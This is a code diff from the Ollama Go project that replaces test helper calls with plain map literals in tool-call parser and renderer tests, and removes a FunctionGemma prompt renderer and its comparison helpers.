wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get current temperature", Name: "get current temperature",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location with spaces": "San Francisco", "location with spaces": "San Francisco",
"unit with spaces": "celsius", "unit with spaces": "celsius",
}), },
}, },
}, },
}, },
@ -578,10 +578,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "\"get current temperature\"", Name: "\"get current temperature\"",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"\"location with spaces\"": "San Francisco", "\"location with spaces\"": "San Francisco",
"\"unit with spaces\"": "\"celsius\"", "\"unit with spaces\"": "\"celsius\"",
}), },
}, },
}, },
}, },
@ -592,12 +592,12 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "calculate", Name: "calculate",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"x": 3.14, "x": 3.14,
"y": float64(42), "y": float64(42),
"enabled": true, "enabled": true,
"items": []any{"a", "b", "c"}, "items": []any{"a", "b", "c"},
}), },
}, },
}, },
}, },
@ -608,9 +608,9 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "exec", Name: "exec",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"command": "ls && echo \"done\"", "command": "ls && echo \"done\"",
}), },
}, },
}, },
}, },
@ -621,9 +621,9 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "exec", Name: "exec",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"command": "ls && echo \"a > b and a < b\"", "command": "ls && echo \"a > b and a < b\"",
}), },
}, },
}, },
}, },
@ -634,10 +634,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "获取天气", Name: "获取天气",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"城市": "北京", "城市": "北京",
"message": "Hello! 你好! 🌟 مرحبا", "message": "Hello! 你好! 🌟 مرحبا",
}), },
}, },
}, },
}, },
@ -648,7 +648,7 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
if err != nil { if err != nil {
t.Errorf("step %d (%s): %v", i, step.name, err) t.Errorf("step %d (%s): %v", i, step.name, err)
} }
if !toolCallEqual(gotToolCall, step.wantToolCall) { if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall) t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
} }
} }

View File

@ -241,10 +241,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get-current-weather", Name: "get-current-weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "San Francisco, CA", "location": "San Francisco, CA",
"unit": "fahrenheit", "unit": "fahrenheit",
}), },
}, },
}, },
}, },
@ -255,10 +255,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get current temperature", Name: "get current temperature",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location with spaces": "San Francisco", "location with spaces": "San Francisco",
"unit with spaces": "celsius", "unit with spaces": "celsius",
}), },
}, },
}, },
}, },
@ -269,10 +269,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "\"get current temperature\"", Name: "\"get current temperature\"",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"\"location with spaces\"": "San Francisco", "\"location with spaces\"": "San Francisco",
"\"unit with spaces\"": "\"celsius\"", "\"unit with spaces\"": "\"celsius\"",
}), },
}, },
}, },
}, },
@ -283,12 +283,12 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "calculate", Name: "calculate",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"x": 3.14, "x": 3.14,
"y": float64(42), "y": float64(42),
"enabled": true, "enabled": true,
"items": []any{"a", "b", "c"}, "items": []any{"a", "b", "c"},
}), },
}, },
}, },
}, },
@ -299,9 +299,9 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "exec", Name: "exec",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"command": "ls && echo \"done\"", "command": "ls && echo \"done\"",
}), },
}, },
}, },
}, },
@ -312,9 +312,9 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "exec", Name: "exec",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"command": "ls && echo \"a > b and a < b\"", "command": "ls && echo \"a > b and a < b\"",
}), },
}, },
}, },
}, },
@ -325,10 +325,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
wantToolCall: api.ToolCall{ wantToolCall: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "获取天气", Name: "获取天气",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"城市": "北京", "城市": "北京",
"message": "Hello! 你好! 🌟 مرحبا", "message": "Hello! 你好! 🌟 مرحبا",
}), },
}, },
}, },
}, },
@ -339,7 +339,7 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
if err != nil { if err != nil {
t.Errorf("step %d (%s): %v", i, step.name, err) t.Errorf("step %d (%s): %v", i, step.name, err)
} }
if !toolCallEqual(gotToolCall, step.wantToolCall) { if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall) t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
} }
} }

View File

@ -1,98 +0,0 @@
package parsers
import (
"encoding/json"
"github.com/google/go-cmp/cmp"
"github.com/ollama/ollama/api"
)
// argsComparer provides cmp options for comparing ToolCallFunctionArguments
// It compares by logical equality (same keys with same values) not by order
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
// Convert both to maps and compare
aMap := a.ToMap()
bMap := b.ToMap()
if len(aMap) != len(bMap) {
return false
}
for k, av := range aMap {
bv, ok := bMap[k]
if !ok {
return false
}
// Use JSON encoding for deep comparison of values
aJSON, _ := json.Marshal(av)
bJSON, _ := json.Marshal(bv)
if string(aJSON) != string(bJSON) {
return false
}
}
return true
})
// propsComparer provides cmp options for comparing ToolPropertiesMap
var propsComparer = cmp.Comparer(func(a, b *api.ToolPropertiesMap) bool {
if a == nil && b == nil {
return true
}
if a == nil || b == nil {
return false
}
aJSON, _ := json.Marshal(a)
bJSON, _ := json.Marshal(b)
return string(aJSON) == string(bJSON)
})
// toolsComparer combines argsComparer and propsComparer for comparing tools
var toolsComparer = cmp.Options{argsComparer, propsComparer}
// toolCallEqual compares two tool calls by comparing their components
// It compares arguments by logical equality (same keys with same values) not by order
func toolCallEqual(a, b api.ToolCall) bool {
if a.ID != b.ID {
return false
}
if a.Function.Index != b.Function.Index {
return false
}
if a.Function.Name != b.Function.Name {
return false
}
// Compare arguments by logical equality using argsComparer logic
aMap := a.Function.Arguments.ToMap()
bMap := b.Function.Arguments.ToMap()
if len(aMap) != len(bMap) {
return false
}
for k, av := range aMap {
bv, ok := bMap[k]
if !ok {
return false
}
aJSON, _ := json.Marshal(av)
bJSON, _ := json.Marshal(bv)
if string(aJSON) != string(bJSON) {
return false
}
}
return true
}
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
props := api.NewToolPropertiesMap()
for k, v := range m {
props.Set(k, v)
}
return props
}
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}

View File

@ -94,12 +94,12 @@ You are a helpful assistant.
Description: "Get current weather", Description: "Get current weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -139,9 +139,9 @@ You have the following functions available:
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -162,9 +162,9 @@ You have the following functions available:
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -186,17 +186,17 @@ You have the following functions available:
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "London", "location": "London",
}), },
}, },
}, },
}, },
@ -226,12 +226,12 @@ You have the following functions available:
Description: "Get current weather", Description: "Get current weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -378,9 +378,9 @@ You are a pirate chatbot who always responds in pirate speak!
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -401,14 +401,14 @@ You are a pirate chatbot who always responds in pirate speak!
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "process_data", Name: "process_data",
Arguments: testArgsOrdered([]orderedArg{ Arguments: api.ToolCallFunctionArguments{
{"config", map[string]any{ "items": []any{"item1", "item2", "item3"},
"config": map[string]any{
"enabled": true, "enabled": true,
"threshold": 0.95, "threshold": 0.95,
"tags": []string{"important", "urgent"}, "tags": []string{"important", "urgent"},
}}, },
{"items", []any{"item1", "item2", "item3"}}, },
}),
}, },
}, },
}, },

View File

@ -82,9 +82,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -104,9 +104,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -125,9 +125,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -147,17 +147,17 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "London", "location": "London",
}), },
}, },
}, },
}, },
@ -214,9 +214,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -235,9 +235,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "process", Name: "process",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"data": "test", "data": "test",
}), },
}, },
}, },
}, },
@ -281,9 +281,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -305,9 +305,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -355,9 +355,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -379,9 +379,9 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -436,17 +436,17 @@ Second instruction<User>Hello<Assistant></think>`,
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "New York", "location": "New York",
}), },
}, },
}, },
}, },
@ -489,12 +489,12 @@ Second instruction<User>Hello<Assistant></think>`,
Description: "Get current weather information", Description: "Get current weather information",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -535,12 +535,12 @@ Where:
Description: "Get current weather information", Description: "Get current weather information",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -578,9 +578,9 @@ Where:
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -594,12 +594,12 @@ Where:
Description: "Get current weather information", Description: "Get current weather information",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -638,9 +638,9 @@ Where:
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -656,12 +656,12 @@ Where:
Description: "Get current weather information", Description: "Get current weather information",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -701,9 +701,9 @@ Where:
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
}, },
@ -724,12 +724,12 @@ Where:
Description: "Get current weather information", Description: "Get current weather information",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -770,12 +770,12 @@ Where:
Description: "Get current weather information", Description: "Get current weather information",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -787,12 +787,12 @@ Where:
Description: "Perform mathematical calculations", Description: "Perform mathematical calculations",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"expression": { "expression": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "Mathematical expression to evaluate", Description: "Mathematical expression to evaluate",
}, },
}), },
Required: []string{"expression"}, Required: []string{"expression"},
}, },
}, },
@ -834,17 +834,17 @@ Where:
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "calculate", Name: "calculate",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"expression": "25 * 4", "expression": "25 * 4",
}), },
}, },
}, },
}, },
@ -860,12 +860,12 @@ Where:
Description: "Get current weather information", Description: "Get current weather information",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },
@ -877,12 +877,12 @@ Where:
Description: "Perform mathematical calculations", Description: "Perform mathematical calculations",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"expression": { "expression": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "Mathematical expression to evaluate", Description: "Mathematical expression to evaluate",
}, },
}), },
Required: []string{"expression"}, Required: []string{"expression"},
}, },
}, },
@ -927,12 +927,12 @@ Where:
Description: "Get current weather information", Description: "Get current weather information",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
Required: []string{"location"}, Required: []string{"location"},
}, },
}, },

View File

@ -1,287 +0,0 @@
package renderers
import (
"fmt"
"sort"
"strings"
"github.com/ollama/ollama/api"
)
type FunctionGemmaRenderer struct{}
const defaultSystemMessage = "You can do function calling with the following functions:"
func (r *FunctionGemmaRenderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) {
var sb strings.Builder
sb.WriteString("<bos>")
var systemMessage string
var loopMessages []api.Message
if len(messages) > 0 && (messages[0].Role == "system" || messages[0].Role == "developer") {
systemMessage = messages[0].Content
loopMessages = messages[1:]
} else {
loopMessages = messages
}
if systemMessage != "" || len(tools) > 0 {
sb.WriteString("<start_of_turn>developer\n")
if systemMessage != "" {
sb.WriteString(strings.TrimSpace(systemMessage))
}
if len(tools) > 0 {
if systemMessage != "" {
sb.WriteString("\n")
}
if strings.TrimSpace(systemMessage) != defaultSystemMessage {
// Only add default message if user does not provide it
sb.WriteString(defaultSystemMessage)
}
}
for _, tool := range tools {
sb.WriteString(r.renderToolDeclaration(tool))
}
sb.WriteString("<end_of_turn>\n")
}
// Track previous message type for tool response handling
prevMessageType := ""
for i, message := range loopMessages {
switch message.Role {
case "assistant":
if prevMessageType != "tool_response" {
sb.WriteString("<start_of_turn>model\n")
}
prevMessageType = ""
if message.Content != "" {
sb.WriteString(strings.TrimSpace(message.Content))
}
if len(message.ToolCalls) > 0 {
for _, tc := range message.ToolCalls {
sb.WriteString(r.formatToolCall(tc))
}
// After tool calls, expect tool responses
if i+1 < len(loopMessages) && loopMessages[i+1].Role == "tool" {
sb.WriteString("<start_function_response>")
prevMessageType = "tool_call"
} else {
sb.WriteString("<end_of_turn>\n")
}
} else {
sb.WriteString("<end_of_turn>\n")
}
case "user":
if prevMessageType != "tool_response" {
sb.WriteString("<start_of_turn>user\n")
}
prevMessageType = ""
sb.WriteString(strings.TrimSpace(message.Content))
sb.WriteString("<end_of_turn>\n")
case "tool":
toolName := ""
// Find the tool name from the previous assistant's tool call
for j := i - 1; j >= 0; j-- {
if loopMessages[j].Role == "assistant" && len(loopMessages[j].ToolCalls) > 0 {
// Count how many tool messages came before this one
toolIdx := 0
for k := j + 1; k < i; k++ {
if loopMessages[k].Role == "tool" {
toolIdx++
}
}
if toolIdx < len(loopMessages[j].ToolCalls) {
toolName = loopMessages[j].ToolCalls[toolIdx].Function.Name
}
break
}
}
if prevMessageType != "tool_call" {
sb.WriteString("<start_function_response>")
}
sb.WriteString("response:" + toolName + "{" + r.formatArgValue(message.Content) + "}<end_function_response>")
prevMessageType = "tool_response"
default:
sb.WriteString("<start_of_turn>" + message.Role + "\n")
sb.WriteString(strings.TrimSpace(message.Content))
sb.WriteString("<end_of_turn>\n")
}
}
if prevMessageType != "tool_response" {
sb.WriteString("<start_of_turn>model\n")
}
return sb.String(), nil
}
func (r *FunctionGemmaRenderer) renderToolDeclaration(tool api.Tool) string {
var sb strings.Builder
fn := tool.Function
sb.WriteString("<start_function_declaration>declaration:" + fn.Name + "{")
sb.WriteString("description:<escape>" + fn.Description + "<escape>")
if fn.Parameters.Properties != nil || fn.Parameters.Type != "" {
sb.WriteString(",parameters:{")
needsComma := false
// Only include properties:{} if there are actual properties
if fn.Parameters.Properties != nil && fn.Parameters.Properties.Len() > 0 {
sb.WriteString("properties:{")
r.writeProperties(&sb, fn.Parameters.Properties)
sb.WriteString("}")
needsComma = true
}
if len(fn.Parameters.Required) > 0 {
if needsComma {
sb.WriteString(",")
}
sb.WriteString("required:[")
for i, req := range fn.Parameters.Required {
if i > 0 {
sb.WriteString(",")
}
sb.WriteString("<escape>" + req + "<escape>")
}
sb.WriteString("]")
needsComma = true
}
if fn.Parameters.Type != "" {
if needsComma {
sb.WriteString(",")
}
sb.WriteString("type:<escape>" + strings.ToUpper(fn.Parameters.Type) + "<escape>")
}
sb.WriteString("}")
}
sb.WriteString("}<end_function_declaration>")
return sb.String()
}
func (r *FunctionGemmaRenderer) writeProperties(sb *strings.Builder, props *api.ToolPropertiesMap) {
keys := make([]string, 0, props.Len())
for k := range props.All() {
keys = append(keys, k)
}
sort.Strings(keys)
first := true
for _, name := range keys {
prop, _ := props.Get(name)
if !first {
sb.WriteString(",")
}
first = false
sb.WriteString(name + ":{description:<escape>")
sb.WriteString(prop.Description)
sb.WriteString("<escape>")
if len(prop.Type) > 0 {
sb.WriteString(",type:<escape>" + strings.ToUpper(prop.Type[0]) + "<escape>")
}
sb.WriteString("}")
}
}
func (r *FunctionGemmaRenderer) formatToolCall(tc api.ToolCall) string {
var sb strings.Builder
sb.WriteString("<start_function_call>call:" + tc.Function.Name + "{")
keys := make([]string, 0, tc.Function.Arguments.Len())
for k := range tc.Function.Arguments.All() {
keys = append(keys, k)
}
sort.Strings(keys)
first := true
for _, key := range keys {
value, _ := tc.Function.Arguments.Get(key)
if !first {
sb.WriteString(",")
}
first = false
sb.WriteString(key + ":" + r.formatArgValue(value))
}
sb.WriteString("}<end_function_call>")
return sb.String()
}
func (r *FunctionGemmaRenderer) formatArgValue(value any) string {
switch v := value.(type) {
case string:
return "<escape>" + v + "<escape>"
case bool:
if v {
return "true"
}
return "false"
case float64:
if v == float64(int64(v)) {
return fmt.Sprintf("%d", int64(v))
}
return fmt.Sprintf("%v", v)
case int, int64, int32:
return fmt.Sprintf("%d", v)
case map[string]any:
return r.formatMapValue(v)
case []any:
return r.formatArrayValue(v)
default:
return fmt.Sprintf("%v", v)
}
}
func (r *FunctionGemmaRenderer) formatMapValue(m map[string]any) string {
var sb strings.Builder
sb.WriteString("{")
keys := make([]string, 0, len(m))
for k := range m {
keys = append(keys, k)
}
sort.Strings(keys)
first := true
for _, key := range keys {
if !first {
sb.WriteString(",")
}
first = false
sb.WriteString(key + ":" + r.formatArgValue(m[key]))
}
sb.WriteString("}")
return sb.String()
}
func (r *FunctionGemmaRenderer) formatArrayValue(arr []any) string {
var sb strings.Builder
sb.WriteString("[")
for i, item := range arr {
if i > 0 {
sb.WriteString(",")
}
sb.WriteString(r.formatArgValue(item))
}
sb.WriteString("]")
return sb.String()
}

View File

@ -1,514 +0,0 @@
package renderers
import (
"testing"
"github.com/ollama/ollama/api"
"github.com/stretchr/testify/assert"
)
func TestFunctionGemmaRenderer(t *testing.T) {
tests := []struct {
name string
messages []api.Message
tools []api.Tool
expected string
}{
{
name: "basic_user_message",
messages: []api.Message{
{Role: "user", Content: "Hello!"},
},
expected: "<bos><start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "with_system_message",
messages: []api.Message{
{Role: "system", Content: "You are helpful"},
{Role: "user", Content: "Hello!"},
},
expected: "<bos><start_of_turn>developer\nYou are helpful<end_of_turn>\n<start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "with_developer_role",
messages: []api.Message{
{Role: "developer", Content: "You are a coding assistant"},
{Role: "user", Content: "Hello!"},
},
expected: "<bos><start_of_turn>developer\nYou are a coding assistant<end_of_turn>\n<start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "custom_system_message_with_tools",
messages: []api.Message{
{Role: "system", Content: "You are a weather expert."},
{Role: "user", Content: "Weather?"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City"},
}),
},
},
},
},
// Custom system message is preserved, tools are appended
